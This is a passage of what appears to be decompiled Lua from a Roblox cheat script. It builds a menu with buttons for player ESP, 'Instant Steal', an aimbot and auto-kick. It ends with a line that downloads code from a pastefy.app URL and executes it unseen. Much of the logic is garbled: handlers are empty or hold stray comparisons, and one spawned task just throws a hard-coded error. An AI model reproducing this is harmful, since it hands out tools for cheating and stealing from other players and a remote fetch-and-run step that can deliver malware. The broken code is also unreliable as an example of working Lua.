local _call1014 = _call997["MouseButton1Click"]:Connect(function()
    _call997["BackgroundColor3"] = Color3["fromRGB"](255, 40, 40)
    _call915["Text"] = "ESP PLAYER ativado!"
    _call915["TextColor3"] = Color3["fromRGB"](255, 40, 40)
    _call915["TextTransparency"] = 0
end)
local _call1021 = Instance["new"]("TextButton", _call873)
_call1021["Size"] = UDim2["new"](0.9, 0, 0, 30)
_call1021["Position"] = UDim2["new"](0.05, 0, 0, 140)
_call1021["BackgroundColor3"] = Color3["fromRGB"](250, 80, 80)
_call1021["Text"] = "Miranda Insta Steal"
_call1021["Font"] = Enum["Font"]["Arcade"]
_call1021["TextColor3"] = Color3["fromRGB"](255, 255, 255)
_call1021["TextSize"] = 15
_call1021["BorderSizePixel"] = 0
local _call1033 = Instance["new"]("UICorner", _call1021)
_call1033["CornerRadius"] = UDim["new"](0, 8)
local _call1037 = Instance["new"]("Frame", _call871)
_call1037["Size"] = UDim2["new"](0, 160, 0, 176)
_call1037["Position"] = UDim2["new"](0.5, 100, 0.5, - 88)
_call1037["BackgroundColor3"] = Color3["fromRGB"](23, 23, 31)
_call1037["BackgroundTransparency"] = 0.13
_call1037["Name"] = "InstantStealPanel"
_call1037["BorderSizePixel"] = 0
_call1037["Visible"] = false
local _call1045 = Instance["new"]("UICorner", _call1037)
_call1045["CornerRadius"] = UDim["new"](0, 12)
local _call1049 = Instance["new"]("TextLabel", _call1037)
_call1049["Size"] = UDim2["new"](1, 0, 0, 20)
_call1049["Position"] = UDim2["new"](0, 0, 0, 0)
_call1049["Text"] = "INSTANT STEAL"
_call1049["TextColor3"] = Color3["fromRGB"](255, 255, 255)
_call1049["Font"] = Enum["Font"]["Arcade"]
_call1049["TextSize"] = 14
_call1049["BackgroundTransparency"] = 1
local _call1059 = Instance["new"]("TextButton", _call1037)
_call1059["Size"] = UDim2["new"](0.88, 0, 0, 38)
_call1059["Position"] = UDim2["new"](0.06, 0, 0, 22)
_call1059["BackgroundColor3"] = Color3["fromRGB"](255, 80, 80)
_call1059["Text"] = "Instant Steal: OFF"
_call1059["Font"] = Enum["Font"]["Arcade"]
_call1059["TextColor3"] = Color3["fromRGB"](255, 255, 255)
_call1059["TextSize"] = 18
_call1059["BorderSizePixel"] = 0
local _call1071 = Instance["new"]("UICorner", _call1059)
_call1071["CornerRadius"] = UDim["new"](0, 8)
local _call1076 = _call1059["MouseButton1Click"]:Connect(function(_1077, _1077_2)
    _call1059["Text"] = "Instant Steal: ON"
    _call1059["BackgroundColor3"] = Color3["fromRGB"](60, 255, 60)
    _call915["Text"] = "Aguardando roubo..."
    _call915["TextColor3"] = Color3["fromRGB"](60, 255, 60)
    _call915["TextTransparency"] = 0
end)
local _call1083 = Instance["new"]("TextButton", _call1037)
_call1083["Size"] = UDim2["new"](0.88, 0, 0, 30)
_call1083["Position"] = UDim2["new"](0.06, 0, 0, 66)
_call1083["BackgroundColor3"] = Color3["fromRGB"](255, 255, 255)
_call1083["Text"] = "Aimbot Teia"
_call1083["Font"] = Enum["Font"]["Arcade"]
_call1083["TextColor3"] = Color3["fromRGB"](0, 0, 0)
_call1083["TextSize"] = 15
_call1083["BorderSizePixel"] = 0
local _call1095 = Instance["new"]("UICorner", _call1083)
_call1095["CornerRadius"] = UDim["new"](0, 8)
local _call1100 = _call1083["MouseButton1Click"]:Connect(function(_1101, _1101_2)
    local _call1103 = _LocalPlayer12:FindFirstChildOfClass("Backpack")
    local _call1105 = _call1103:FindFirstChild("Web Slinger")
    local _call1110 = _LocalPlayer12["Character"]["Humanoid"]:EquipTool(_call1103["Web Slinger"])
    local _call1113 = _LocalPlayer12["Character"]:FindFirstChild("Web Slinger")
    local _call1115 = _call5:FindFirstChild("Packages")
    local _call1118 = _call5["Packages"]:FindFirstChild("Net")
    local _call1122 = _call5["Packages"]["Net"]:FindFirstChild("RE/UseItem")
    local _call1125 = _LocalPlayer12["Character"]:FindFirstChild("HumanoidRootPart")
    for _1128, _1128_2 in ipairs(_call3:GetPlayers()) do
        local _1129 = (_1128_2 == _LocalPlayer12)
    end
    _call915["Text"] = "Aimbot Teia usado!"
    _call915["TextColor3"] = Color3["fromRGB"](255, 255, 255)
    _call915["TextTransparency"] = 0
end)
local _call1133 = Instance["new"]("TextButton", _call1037)
_call1133["Size"] = UDim2["new"](0.58, - 5, 0, 28)
_call1133["Position"] = UDim2["new"](0.06, 0, 0, 102)
_call1133["BackgroundColor3"] = Color3["fromRGB"](200, 0, 60)
_call1133["Text"] = "AUTO KICK"
_call1133["Font"] = Enum["Font"]["Arcade"]
_call1133["TextColor3"] = Color3["fromRGB"](255, 255, 255)
_call1133["TextSize"] = 15
_call1133["BorderSizePixel"] = 0
local _call1145 = Instance["new"]("UICorner", _call1133)
_call1145["CornerRadius"] = UDim["new"](0, 8)
local _call1149 = Instance["new"]("TextLabel", _call1037)
_call1149["Size"] = UDim2["new"](0.32, - 5, 0, 28)
_call1149["Position"] = UDim2["new"](0.62, 0, 0, 102)
_call1149["BackgroundColor3"] = Color3["fromRGB"](0, 0, 0)
_call1149["Text"] = "OFF"
_call1149["Font"] = Enum["Font"]["Arcade"]
_call1149["TextColor3"] = Color3["fromRGB"](255, 255, 255)
_call1149["TextSize"] = 13
_call1149["BorderSizePixel"] = 0
local _call1161 = Instance["new"]("UICorner", _call1149)
_call1161["CornerRadius"] = UDim["new"](0, 8)
local _call1166 = _call1133["MouseButton1Click"]:Connect(function(_1167, _1167_2)
    _call915["Text"] = "AUTO KICK ativado!"
    _call915["TextColor3"] = Color3["fromRGB"](60, 200, 60)
    _call915["TextTransparency"] = 0
    _call1149["BackgroundColor3"] = Color3["fromRGB"](60, 200, 60)
    _call1149["Text"] = "ON"
end)
_call1149["BackgroundColor3"] = Color3["fromRGB"](60, 200, 60)
_call1149["Text"] = "ON"
local _call1176 = _call1021["MouseButton1Click"]:Connect(function(_1177, _1177_2, _1177_3)
    local _Visible1178 = _call1037["Visible"]
    _call1037["Visible"] = false
end)
local _call1180 = Instance["new"]("ImageButton")
_call1180["Size"] = UDim2["new"](0, 50, 0, 50)
_call1180["Position"] = UDim2["new"](0, 20, 0.5, - 20)
_call1180["Image"] = "rbxassetid://104600425304678"
_call1180["BackgroundTransparency"] = 1
_call1180["Name"] = "OpenButton"
_call1180["Parent"] = _call871
local _call1186 = Instance["new"]("UICorner", _call1180)
_call1186["CornerRadius"] = UDim["new"](1, 0)
local _call1190 = Instance["new"]("UIStroke", _call1180)
_call1190["Thickness"] = 2
_call1190["Transparency"] = 0.15
local _call1192 = task["spawn"](function(_1193, _1193_2, _1193_3, _1193_4)
    local _ = task.wait(0.11)
    local _1196, _1196_2, _1196_3 = math.sin((tick() * 1.4))
    local er = error("line 1: attempt to compare number < table")
end)
local _call1199 = _call1180["MouseButton1Click"]:Connect(function(_1200, _1200_2, _1200_3)
    local _Visible1201 = _call873["Visible"]
    _call873["Visible"] = false
end)
local _call1204 = _call1037["InputBegan"]:Connect(function(_1205)
    local _1209 = (_1205["UserInputType"] == Enum["UserInputType"]["MouseButton1"])
    local _Position1210 = _1205["Position"]
    local _Position1211 = _call1037["Position"]
    local _call1214 = _1205["Changed"]:Connect(function(_1215, _1215_2, _1215_3, _1215_4)
        local _1219 = (_1205["UserInputState"] == Enum["UserInputState"]["End"])
    end)
end)
local _call1222 = _call1037["InputChanged"]:Connect(function(_1223, _1223_2, _1223_3, _1223_4, _1223_5, _1223_6)
    local _1227 = (_1223["UserInputType"] == Enum["UserInputType"]["MouseMovement"])
end)
local _call1230 = _call7["InputChanged"]:Connect(function(_1231)

end)
local _call1234 = _call873["InputBegan"]:Connect(function(_1235)
    local _1239 = (_1235["UserInputType"] == Enum["UserInputType"]["MouseButton1"])
    local _Position1240 = _1235["Position"]
    local _Position1241 = _call873["Position"]
    local _call1244 = _1235["Changed"]:Connect(function(_1245, _1245_2, _1245_3, _1245_4)
        local _1249 = (_1235["UserInputState"] == Enum["UserInputState"]["End"])
    end)
end)
local _call1252 = _call873["InputChanged"]:Connect(function(_1253, _1253_2, _1253_3, _1253_4, _1253_5, _1253_6)
    local _1257 = (_1253["UserInputType"] == Enum["UserInputType"]["MouseMovement"])
end)
local _call1260 = _call7["InputChanged"]:Connect(function(_1261)

end)
local _call1264 = _call1180["InputBegan"]:Connect(function(_1265)
    local _1269 = (_1265["UserInputType"] == Enum["UserInputType"]["MouseButton1"])
    local _Position1270 = _1265["Position"]
    local _Position1271 = _call1180["Position"]
    local _call1274 = _1265["Changed"]:Connect(function(_1275, _1275_2, _1275_3, _1275_4)
        local _1279 = (_1265["UserInputState"] == Enum["UserInputState"]["End"])
    end)
end)
local _call1282 = _call1180["InputChanged"]:Connect(function(_1283, _1283_2, _1283_3, _1283_4, _1283_5, _1283_6)
    local _1287 = (_1283["UserInputType"] == Enum["UserInputType"]["MouseMovement"])
end)
local _call1290 = _call7["InputChanged"]:Connect(function(_1291)

end)
local _1295 = loadstring(game:HttpGet("https://pastefy.app/G8oud2KG/raw"))()
